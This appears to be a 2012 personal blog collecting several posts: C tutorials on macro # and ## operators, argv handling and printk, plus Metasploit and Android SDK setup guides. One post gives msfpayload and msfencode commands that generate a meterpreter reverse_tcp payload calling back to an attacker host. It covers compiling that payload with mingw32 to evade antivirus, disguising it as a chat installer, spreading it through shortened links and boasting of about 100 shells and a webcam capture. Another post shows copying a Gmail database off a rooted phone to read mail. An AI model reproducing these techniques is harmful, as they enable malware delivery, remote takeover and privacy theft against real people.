Saturday 16 June 2012

COMPLICATED PARAMETER PASSING IN #DEFINEs

If you are familiar with this term then you are surely a good programmer;
we are often pushed to use it in our programs.

Why is it so important? Well, the uses of this so-called preprocessor are endless:

from basic macro substitution to case-based selection,

and even some combined with the ternary operator ( ? : ).

Up to this point everything goes well for most of us,

but it becomes a pain in the place we hate the most as soon as we meet this type of declaration.
I have seen some really good programmers fall for this type of confusion.

--------------------------------------------------------------------------------------------------------------------------------------

#define true_statement(num) printf(#num " = %d\n", num)

--------------------------------------------------------------------------------------------------------------------------------------

For many people it's like, how the f@#$ did another pound symbol get in there?
This goes for guys learning programming online, because 70-80% of the sites teaching the C language do not cover this minute detail.

Documentation for this type of usage can be found
 in the very famous "THE C PROGRAMMING LANGUAGE" by Kernighan and Ritchie.

As taken from their book:
"formal parameters are not replaced within quoted strings. If, however, a parameter name is preceded by a # in the replacement text, the combination will be expanded into a quoted string with the parameter replaced by the actual argument"

So
------------------------------------------------------------------------------------------------------------------------------------
//when invoked with the value 2, i.e. true_statement(2)

the macro gets expanded into

printf("2" " = %d\n" , 2);

As we know, adjacent string literals ("" "") in C get concatenated,

so the end result is

printf("2 = %d\n" , 2);


-------------------------------------------------------------------------------------------------------------------------------------

The example shown above is for an integer argument;
another question may well arise for many readers:

How does it manage special characters, then??

These are the characters that must have crossed your mind, because these
are the ones that can lead to an illegal string:

 "  (double quote)
 \  (backslash)

You don't need to worry about it; it gets fixed within the actual argument itself:

each " gets converted to \" and each \ gets converted to \\,
so the string is still legal.


These types of reference are rarely used in common practice;
the most common reason to avoid them is that most people do not understand them.

That was a rare example, though one that can still be found,
but this next one is totally a once-in-a-decade issue.

-------------------------------------------------------------------------------------------------------------------------------------
 #define two_digit(tenth_place,unit_place) tenth_place##unit_place
 -------------------------------------------------------------------------------------------------------------------------------------

One pound symbol was enough to create confusion, and now here we have two of them, but don't get fooled by the look; it's actually easier to understand than the previous one.

The parameters passed in get concatenated with each other.

## causes all white space surrounding it to be removed, and if a parameter lies adjacent to it, the parameter is replaced with the actual argument.

Eg.
-------------------------------------------------------------------------------------------------------------------------------------
two_digit(1,2)

will result in

12
-------------------------------------------------------------------------------------------------------------------------------------
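
An added example, not from the original post, that puts both operators to work. It goes a little beyond the text by showing that # does not expand its argument unless a second macro level is used, and by combining # and ## in a small command table. STR, XSTR, LIMIT, CMD and the cmd_* functions are names made up for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* The two macros from the post. */
#define true_statement(num) printf(#num " = %d\n", num)
#define two_digit(tenth_place, unit_place) tenth_place##unit_place

/* Everything below (STR, XSTR, LIMIT, CMD, cmd_*) is invented for this example. */
#define STR(x)  #x      /* stringify the argument exactly as it was written */
#define XSTR(x) STR(x)  /* expand the argument first, then stringify it     */
#define LIMIT 42

/* # escapes the " and \ of a string literal argument, so the result holds
   the source spelling of the argument: quote, h, i, backslash, n, quote. */
const char *quoted_arg(void) { return STR("hi\n"); }

/* # does not expand its argument: this yields the text LIMIT, not 42. */
const char *unexpanded(void) { return STR(LIMIT); }

/* One extra macro level lets LIMIT expand before # is applied. */
const char *expanded(void) { return XSTR(LIMIT); }

/* ## pastes the tokens 1 and 2 into one integer token. */
int pasted(void) { return two_digit(1, 2); }

/* A typical combined use: one table row per command, with the name made
   by # and the handler identifier made by ##. */
static int cmd_add(int a, int b) { return a + b; }
static int cmd_sub(int a, int b) { return a - b; }

struct command {
    const char *name;
    int (*fn)(int, int);
};

#define CMD(name) { #name, cmd_##name }
static const struct command commands[] = { CMD(add), CMD(sub) };

/* Run the command called name. Returns 0 and stores the result,
   or returns -1 when no such command is in the table. */
int run_command(const char *name, int a, int b, int *result)
{
    size_t i;
    for (i = 0; i < sizeof commands / sizeof commands[0]; i++) {
        if (strcmp(commands[i].name, name) == 0) {
            *result = commands[i].fn(a, b);
            return 0;
        }
    }
    return -1;
}

int main(void)
{
    int num = 2, r = 0;
    true_statement(num);   /* the variable's name is what gets stringified */
    true_statement(2);     /* the case walked through in the post */
    printf("%s | %s | %s | %d\n",
           quoted_arg(), unexpanded(), expanded(), pasted());
    if (run_command("add", 7, 5, &r) == 0)
        printf("add -> %d\n", r);
    return 0;
}
```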

I hope you enjoyed reading this article,

Thanks for reading.
B-)

Friday 15 June 2012

DEFEATING ANTI VIRUSES WITH DORKY TECHNIQUES


THIS INFORMATION IS FOR EDUCATIONAL PURPOSES ONLY. I WILL NOT BE HELD LIABLE
FOR WHAT YOU DO WITH THIS INFORMATION.

NOT FOR BEGINNERS,
PRIOR KNOWLEDGE OF C/C++ LANGUAGE IS NECESSARY, AND FUNCTIONING OF METASPLOIT FRAMEWORK.


//ALSO, THIS TECHNIQUE WAS FOUND BY ME ON 8/6/12. SO IT WILL KEEP WORKING ONLY UNTIL THE AV COMPANIES RELEASE AN UPDATE PATCH.

Most of you guys are familiar with the Metasploit framework, which is really popular for its ever-growing inventory of exploits and tools, but at the same time anti-virus companies are trying to keep pace with this open-source project.

Everything in Metasploit's arsenal is now heavily tagged by all AVs and gets detected instantly. In spite of this, people are using it and still getting their job done.

The question is, how??

When I started out on this topic, there were numerous videos and articles about bypassing antiviruses on YouTube and forums.
But as you go down the articles and reach the comments, you will usually find
“sorry dude doesnt work anymore antiviruses tagging this also”.

Not their fault, the companies are keeping up well.

But still, some guys out there in the wild are running ahead of them.


If you were in a situation similar to mine, you must have also tried out every possible combination of encoders, and also the various crypters available online.

And some lazy chaps, or maybe security professionals, can afford the paid crypting services on the market.

But now even that is not a problem; companies are providing these services at prices even cheaper than you can imagine, just to cut down their competition.

Now let's start with the built-in tools,

msfpayload --> simply generating an exe from this file was never a good choice.

msfpayload | msfencode --> this is what many people have tried

The technique that I found is the result of weird thoughts while having leftover snacks late at night.
Happy I had that.

Most of you who have used msfpayload are pretty familiar with its usage and how it can be used to generate shellcode,
and also a raw stream to pipe into other tools like msfencode.

On simply creating shellcode with msfpayload

$ /msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.14 lport=4474 C

/*
* windows/meterpreter/reverse_tcp - 290 bytes (stage 1)
* http://www.metasploit.com
* AutoRunScript=, ReverseConnectRetries=5, EXITFUNC=process,
* LPORT=4474, InitialAutoRunScript=, AutoSystemInfo=true,
* LHOST=192.168.1.14, AutoLoadStdapi=true, VERBOSE=false,
* EnableUnicodeEncoding=true
*/
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0

------trimmed -------------------------------------------------------------
/*
* windows/meterpreter/reverse_tcp - 752128 bytes (stage 2)
* http://www.metasploit.com
*/
unsigned char buf[] =
"\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3"
"\x4c\x15\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50"
"\xff\xd0\x68\xf0\xb5\xa2\x56\x68\x05\x00\x00\x00\x50\xff\xd3"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xf0\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01"

----------trimmed-----------------------------------------------------------

So here we have our two-stage meterpreter code,
but string termination will occur because of
the many null bytes (\x00).


So we encode it with msfencode

$ ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.14 lport=4474 R | ./msfencode -b \x00 -c 20 -e x86/shikata_ga_nai -t c

Now we are left with a clean shellcode free of null characters



Now comes the part which worked wonders for me and left me with around 100 shells in one week.


Pipe out this shellcode and compile it with mingw32.

Yes guys, that's the trick.

On any Debian system just issue

$ apt-get install mingw32

and then you have it.




For some social-engineering fu i added

printf(“Extracting installer 96%.................”);

// I know it's stupid, still worked for me.

Before the typecasted call to our payload.

And renamed my exe to “gtalk-fb-interchat-v7.83.exe”
it was catchy. Huh.

Now the major part is done.

I moved it to a virtual machine I had,

CONFIG
Xp sp3
Avira free (updated 15/5/2012 16:00pm)

Next are the screens for scanning









So everything worked out pretty well; let's test it with a real user.

Fired up my apache2, hosted on my own machine, and the URL was shortened with “tinyurl”
and “GOOGLE URL GENERATOR”.

Here is the result for that also



How can we forget the pretty face.

Initiated webcam snap


Similar types of social-engineered attacks were performed throughout the week,
and
79 antiviruses were found to be unable to detect this (including enterprise and free editions).

THANKS FOR READING

/// ALL PRIOR PERMISSIONS WERE TAKEN FROM OUR FRIENDLY VICTIM “AERIALS ASHU” BEFORE INCLUDING THESE PICTURES.

 Thanks for reading, for queries and suggestions plz comment below.
B-)


I have uploaded a video as a p.o.c as well

 

Thursday 14 June 2012

Setting up metasploit framework on any linux the easy way !!

In this post I will guide you through an easy method of setting up your exploitation framework, and this tool is none other than the superior Metasploit framework.

GUYS, THIS TUTORIAL IS FOR LINUX. IF YOU WANT THE SAME FOR WINDOWS, COMMENT OR MESSAGE ME.

So let's start out,

tools required :: a Linux OS

It's up to you which one you prefer; I'm using Arch Linux but you can use Ubuntu. It's a newbie-friendly distro compared to Arch.
www.ubuntu.com

I'm assuming that your OS is installed (on disk or virtually, it doesn't matter) and updated (if not, do it, and if you don't know how, check below).

This whole framework depends on the Ruby language,
so first of all we need to resolve the required dependencies.
------------------------------------------------------------------------------------------------------------------------------

apt-get update && apt-get upgrade
//this will do the update part

now the dependencies

$ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems

this will install the necessary packages
-------------------------------------------------------------------------------------------------------------------------------


Now, the method we will be using to fetch Metasploit for our system is Subversion.
To know more about it:
http://subversion.apache.org/

So install this also


-----------------------------------------------------------------------------------------------------------------------------------
$ apt-get install subversion
-----------------------------------------------------------------------------------------------------------------------------------

And now some other deps, needed to build native extensions

------------------------------------------------------------------------------------------------------------------------------------
$ sudo apt-get install build-essential ruby-dev libpcap-dev
------------------------------------------------------------------------------------------------------------------------------------

Now the minor things are done; next comes the important part.

Subversion is a version control system; basically, it synchronises your local folder with the remote folder being used as the development base.

The remote URL we will be using :: https://www.metasploit.com/svn/framework3/trunk/

This is where Subversion will fetch all the files from.

So first, to check your Subversion setup, issue this command

-----------------------------------------------------------------------------------------------------------------------------------
$ svn ls https://www.metasploit.com/svn/framework3/trunk/

svn >> short for subversion, this is the name used for its commands
-----------------------------------------------------------------------------------------------------------------------------------

Something like this should be visible; it will list the remote folders and files


If you get something similar, that means you are ready to go.

Now, do
------------------------------------------------------------------------------------------------------------------------------------
$ svn checkout https://www.metasploit.com/svn/framework3/trunk/ msf
or
$ svn co https://www.metasploit.com/svn/framework3/trunk/ msf

both are the same; co is short for checkout, just as svn is short for subversion
--------------------------------------------------------------------------------------------------------------------------------------
This will create a folder named msf, with all the files, in your current directory.

This is a big download and takes a few seconds to initiate, so wait for it;

soon it will start and your screen will be filled with data transfer details


So now you are back with all the downloaded files.

If you now issue the ls command you will surely
see all the files

This is it, your framework is successfully installed.

 UPDATE

Now, to update it this command can be used; for that you have to come to this directory every time, as Subversion checks the current directory to recognize the point of the last update

------------------------------------------------------------------------------------------------------------------------------------
$ svn update
------------------------------------------------------------------------------------------------------------------------------------
//As you have just installed it you won't need any update yet, but I would recommend updating it every day or two for the latest exploits; I usually do it every day myself, and you can automate this with crontab.

After each update a revision no. is shown to keep track, like this

Now you can test your main tool; all of these msf* tools are extremely useful and, if used in a combined manner, can render a desired exploitation.



issue this command
------------------------------------------------------------------------------------------------------------------------------------
$ ./msfconsole
------------------------------------------------------------------------------------------------------------------------------------
If it loads up with the Ruby interpreter without any errors then you are good to go; it should look like this, and you will be welcomed with a msf> prompt







EXTENSIONS

Now comes the part about installing extensions; it is not a priority, but it is required to enable the raw socket and wifi modules.


Raw sockets:
go to the dir where you installed msf, then into external, and then

----------------------------------------------------------------------------------------------------------------------------------
$ cd /opt/metasploit3/msf3/external/pcaprub/

$ ruby extconf.rb
$ make && make install

----------------------------------------------------------------------------------------------------------------------------------

Wifi modules

-----------------------------------------------------------------------------------------------------------------------------------

# cd  /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install

-------------------------------------------------------------------------------------------------------------------------------------

And we are done, so go on and test out your new framework.

Thanks for reading, and plz comment for any help

B-)



How safe is your Android device

Hi guys, this is yash aka yinsain, back again with a long-awaited post.

THIS IS FOR EDUCATIONAL PURPOSES, I HAVE NO INVOLVEMENT IN WHAT YOU DO WITH THE INFORMATION PROVIDED.

Nowadays most of the people around us favour an Android device as their smartphone; well, after all, it's a smart choice too.

The first thing that people think of while using a smartphone is staying online and updated.
But how safe is it? People are scribbling down their credentials on this tiny device to stay in contact, but to date nothing has changed: every app, or even a system, requires a lookup file to authenticate whether the true user is there or not.

Passwords are still the strongest and the weakest security link in the whole infosec thing.

Whenever even a kid hears about hacking, the first thing that comes to his/her mind is the password of an email id; well, here I will show you how to get into one without using a password.

So we will focus this post on that, and then we will blend into other security aspects of what can be risky and what can't.

There are two possible scenarios
--> either you have a brand new phone, or a phone that you use as a casual guy, nothing hardcore or test-head, and by mistake you install a malicious apk that roots your phone to gain privileges; this is how most of these things work.
An example is the infamous GINGERBREAK exploit, which created chaos because it was used in other malicious apks.

--> or you might have a rooted phone like me, one that you rooted for your experiments,

but how aware are you of all the possible danger factors?

So let's start with a rooted phone, because in both of the cases above this is the end point.

I will be using my real phone, not an emulator, to show this, so in this post
my details will be visible.

Let's plug this phone in in debugging mode and spawn the shell.



 The layout is pretty standard.

Now let's move to the attractive folder, data, and then again into the data folder inside it.



Now issue the ls command; it will show you a long list of the installed apks' data folders.



Now we can easily navigate to the folder of our desired app.

Our grapes reside inside the com.google.android.gm folder, so go into that and then into databases, and again issue the ls command.

As you can see, my email id is there in a folder name.

But the useful db file is downloads.db for Android 2.1, and for my specific cyanogenmod7rc2 it's mailstore.ydeep18@gmail.com.db; we will copy that out to the sdcard for further inspection.

cp  mailstore.ydeep18@gmail.com.db /sdcard



As this phone is rooted, there will be no access-denied problem, just as there won't be one for any attacker who has gained a root shell on your device.


Now we have our db file; now, how to open it? Well, I did this while I was in Kota in a hostel, where I had no PC around me for a year, so I downloaded an app on the phone itself to do this.
APP :: aSQLiteManager


Let's start first with the phone,
so open up your aSQLiteManager






Open the db file, the mailstore one.



 Select whichever table you want to view, but I know the juicy one is messages, so let's open that


and with all your guts click on data to know the truth....



And there it is, all your synchronised email; now say, who needs a password?
And continuously scrolling sideways




As you can see, this can be lethal.

PREVENTIONS
:: please check the permissions needed by your application before installing
:: never leave your phone unattended. This works 90% of the time.

I will soon post other stuff on Android forensics

Thanks for reading
B-)



Setting up your android tools ;]

Guys, I'm informing you again that this is not a tutorial for development; the only things covered in this post will be about setting up your Android tools.
Further posts may dig even deeper into Android forensics.

So before even starting your setup you should first decide on your platform. I would recommend a Mac or a Linux box, and this tutorial follows the same. But Windows guys, don't feel bad; comment below and I will respond with solutions and help.

So guys, if you are familiar with Linux then it's a plus point; if you aren't, that's not a major issue either, you can catch up any time you want. Download an iso of a Linux distribution of your preference. I would recommend Ubuntu, it's a bit rookie friendly.
Here's the download link.
These distros are available in livecd format, but you will require a system with the installation done because you want your changes to be persistent.

Daring new guys can surely install it on a system, but if you are scared of blowing away your close-to-your-heart Windows installation then virtualization solutions are always available.

You can try out virtual-box or vmware-player; both are excellent.

I won't be guiding you through a Linux installation, so google it.

So, let's assume you now have a working Linux distribution on a disk or virtually, or maybe you are on the classier side and giving a smirk with a Mac.
But Mac guys, take care and check out the documentation, because I'm not helping.

Linux guys, now fire up your terminal.
If you are on an older version of Ubuntu, say before 11.04, then you are probably on the GNOME 2 environment, so go to Applications and under Accessories or System Tools there will be a terminal; on a newer distro, just hit your Windows key and type in terminal, and it will be there.


So you have your terminal opened up.

Now let's resolve the dependencies required to run our SDK.

----------------------------------------------------------------------------------------------------
 
apt-get install default-jre

and if you are on a 64-bit machine like me, then also

apt-get install ia32-libs
------------------------------------------------------------------------
 

Now we require our SDK;
you can get it from

http://developer.android.com/sdk/index.html

As we are working on Linux, fetch the required tar file and place it in a
folder of your choice.

Usually additional installations are done under the /opt directory, but feel free to put it anywhere; for the rest of the post I will be keeping it in /opt.

Gain the required privileges for that folder and continue to extract it.

Newbies, please just right click and follow along.
Guys who are comfortable and want to learn, do this
----------------------------------------------------------------------------------------------------------------
reach your directory and

do

tar zxvf android-sdk_r18-linux.tgz

the no. after r may vary for you depending on when you are viewing this
-----------------------------------------------------------------------------------------------------------------

Now cd into the directory and issue the ls command

Now some of the sub-directories are visible.
The first and most important utility required is adb, but unfortunately it has been moved to the platform-tools folder, which means we have to download it.
For that, go into the tools directory and enter ./android.

Another screen will pop up showing a GUI like this; select Android platform tools and then click on install package.

Let it download the required package.

After it's done, go back to the upper directory and then into platform-tools, and issue the ls command.





So here we are; the two most important tools that we require are here:
adb and fastboot.

Now you can issue the command ./adb devices, but no devices will be shown if none is connected in debugging mode,




Here is how you can put your Android in debugging mode: go to settings/application/development and then select Android debugging.



So now your device is ready;
try again, it should show up now.


Now you can issue the ./adb shell command too; as this is the only device connected, it will drop you into its shell,
and now it's up to you how you explore it.


And we have the Android shell..


Plz do follow; the next post regarding Android will go into the forensics of its filesystem.

Thanks for reading
B-)



Truth about the abundantly used printf()

If you are a beginner programmer in C, then you must have written almost every program with a printf() call. What is so important about it that we use it in most of our programs?
It provides us with visual details of what a program is outputting. It basically writes its result out onto stdout.

But if you go through the lines written by the creators themselves, i.e. Brian W. Kernighan and Dennis M. Ritchie, you will be shocked for a bit, but it is the truth,

"by the way, printf is not a part of the C language; there is no input or output defined in C itself. printf is just a useful function from the standard library of functions that are normally accessible to C programs."

This thin yet powerful language, which is said to be portable, is in fact only as portable as its libraries. Its libraries are its extensions, which create functionality.
There are just so many libraries available in the wild, supporting all types of architectures and instruction sets, that it may appear the C language is highly portable.

As this language is a major constituent of the famous Unix OS and the GNU/Linux kernel, you can judge how powerful it is. But still, most of the work is done under the hood; no output is written to a console for every little syscall or connection.

This can be very easily explained by a simple example of kernel programming.
here

  

 As you can see, there is no use of printf in this; printk is used instead.


The makefile for the same is here





Issue the make command to generate the necessary executables.



 So as you can see, a kernel module has been compiled.
Now let's insert our module into the kernel with the insmod command. {use sudo if required for privileges}


 So now the module has been inserted successfully, and a weird question arises: where is the output of printk()?

Here it is, the last line. This log can be viewed with the dmesg command. The same thing happens when we remove our module from the kernel by issuing the rmmod command: it then prints out the line in cleanup_module(),



Still, for many of you there is a question that haunts you: where did the output go, and why did it never come up on any console screen?

In this example the procedure of module loading and unloading is shown; this takes place several times during your reboots and shutdowns, but for most of them no output is shown, just a mere on-success status is passed.
printf is similar; it is just for our better presentation and debugging help, and in real programming it never plays any major role. This whole module loading thing was managed by the kernel, and all the outputs were logged by syslogd/klogd. These daemons are high-end designs/programs created in C, yet they don't use printf().


I hope this was of help for you. Thanks for reading. B-)

Argument passing to main() function explained

I have seen many people put up videos tutoring on C programming and stuff,
but most of those videos lack some of the major concepts important for practical
programming.
So I thought, why not cover this topic too; this is also an outcome of requests from friends having problems with the same topic.

Prior knowledge of string constants, argument passing, pointers and pointers to pointers is necessary in any programming language and helps ease you into it; if you know C then it's even better.

Let's start with a simple piece of code that is so popular that even a non-programmer who once wanted to learn programming but lost interest must have seen it before throwing the book away; yeah, you got me right, it's the old-school HELLO WORLD example

+--------------------------------------------------------------------------------------------------------------------------------+

#include <stdio.h>

int main(void){

printf("hello world");
return 0;
}

+---------------------------------------------------------------------------------------------------------------------------------+

When you compile this code snippet, you get the usual hello world output on screen, but this constrains our will to program the way we want: in this example the hello world string gets hard-coded into the executable generated by compiling.

One question commonly arises: why can't it be dynamic??
The answer is simple: it can be made dynamic; the creators of C were not so foolish as to leave such a thing out. This can be achieved with parameter passing just like for any other function; the only difference with this type of argument passing is that the arguments are passed from the environment of your OS, not from inside your program.

With a slight modification to the code above you can achieve it,

+--------------------------------------------------------------------------------------------------------------------------------+

#include <stdio.h>

int main(int argc, char *argv[])
// sometimes also seen as main(int argc, char **argv)
{
if (argc < 2) return 1; // no parameter given, so there is no argv[1] to print
printf("%s",argv[1]);
return 0;
}

+--------------------------------------------------------------------------------------------------------------------------------+

Now the explanation bit,

the structure of your main has changed to

main(INT, CHAR POINTER TO STRING POINTERS)


Let's start with the first argument

argc --> it's an integer data type,
        --> keeps the count of total arguments

In a standalone program with no parameters, the value of argc is always 1;
this facility can be used for error checking
IF (parameters less than 2)
PRINT plz check the usage or plz pass correct number of arguments.

This variable increments with the number of parameters you pass.

Let's say your compiled program is helloworld.

So on a Linux box

$./helloworld hello this is a parameter passing example

or a windows machine

>helloworld.exe hello this is a parameter passing example

the value of argc will increment this way

+------------+------------+------+----+---+-----------+
| execution  | helloworld | this | is | a | parameter |
+------------+------------+------+----+---+-----------+
| argc       | 1          | 2    | 3  | 4 | 5         |
+------------+------------+------+----+---+-----------+

and so it goes on.

Now let's get on to the next parameter,

char *argv[] or **argv


--> this is a pointer to an array of pointers

This is the portion where it gets confusing for some people, but I will start from the base and we can build our way up,

so, the concept of an array

What is an array??

It is a contiguous block of memory which can be used to store data in order.
The main points about it:

--> an array name acts as a pointer itself;
basically it points to the first memory block of the array.

So this code is also perfectly legal,

-------------------------------------------------------------------
int *p, egarray[2] = {10, 20};
p = egarray;   /* the array name gives the address of egarray[0] */
/* egarray[0] and *p output the same value */
printf("%d %d\n", egarray[0], *p);
----------------------------------------------------------------------

 Arrays can be created for all possible datatypes depending on your needs; int, char and struct arrays are common, and the same goes for arrays of pointers.

Think of it as a set of registers, each of which stores the starting point of another array.

Pointer to pointer can be explained like this,

array ar;
                      ar0 | p1| -->q1
                      ar1 | p2| -->q2
                      ar2 | p3| -->q3
                      ar3 | p4| -->q4
                      ar4 | p5| -->q5

And these q pointers can be anything,
but in this case we are talking about parameter passing, which is generally in the form of a statement/string.

So these q are all themselves in the form of

q="your parameter for the no. respectively";

So I hope this clears up the two parameters of main()

I have also uploaded a video to show you the gist of it, for gaining practical
confidence, here.


There is one more minute query left which people get stuck on; don't worry, I will cover that too,

why are there no " " in system() while using argv[]????

Simple: these functions take a string as input, and argv[] supplies it to them as a pointer leading to that string.
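
An added example, not part of the original post: it checks argc before touching argv[1], walks argv up to its terminating NULL, and, because system() hands the string to the shell unchanged, only builds a command from an argument made of plain characters. The helper names, the allowlist and the "echo" command are choices made for this illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample: the argv the OS builds for the post's command line
   ./helloworld hello this is a parameter passing example */
static char *SAMPLE_ARGV[] = {
    "./helloworld", "hello", "this", "is", "a",
    "parameter", "passing", "example", NULL
};

/* argv[argc] is always NULL, so walking to the terminator gives argc. */
int count_args(char **argv)
{
    int n = 0;
    while (argv[n] != NULL)
        n++;
    return n;
}

/* Return argv[idx] only if that argument exists, otherwise NULL. */
const char *arg_or_null(int argc, char **argv, int idx)
{
    if (idx < 0 || idx >= argc)
        return NULL;
    return argv[idx];
}

/* Allowlist for text that will become part of a shell command line:
   letters, digits, '_' and '.', plus '-' anywhere but the first position
   (a leading '-' would be read as an option by the command). */
int is_plain_word(const char *s)
{
    size_t i;
    if (s == NULL || s[0] == '\0' || s[0] == '-')
        return 0;
    for (i = 0; s[i] != '\0'; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '_' && c != '.' && c != '-')
            return 0;
    }
    return 1;
}

/* Build "echo <arg>" for system(). Returns 0 on success, or -1 when the
   argument is refused or the buffer is too small. */
int build_echo_command(const char *arg, char *out, size_t outlen)
{
    int n;
    if (!is_plain_word(arg))
        return -1;
    n = snprintf(out, outlen, "echo %s", arg);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return 0;
}

int main(int argc, char *argv[])
{
    char cmd[128];
    const char *first = arg_or_null(argc, argv, 1);

    printf("sample line has %d arguments\n", count_args(SAMPLE_ARGV));
    if (first == NULL) {
        fprintf(stderr, "usage: %s <word>\n", argv[0]);
        return 1;
    }
    printf("argc = %d, counted = %d\n", argc, count_args(argv));
    if (build_echo_command(first, cmd, sizeof cmd) != 0) {
        fprintf(stderr, "refusing to pass \"%s\" to system()\n", first);
        return 1;
    }
    return system(cmd) == 0 ? 0 : 1;
}
```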

Thanks for reading,
I hope this clears away some clouds for you.
B-)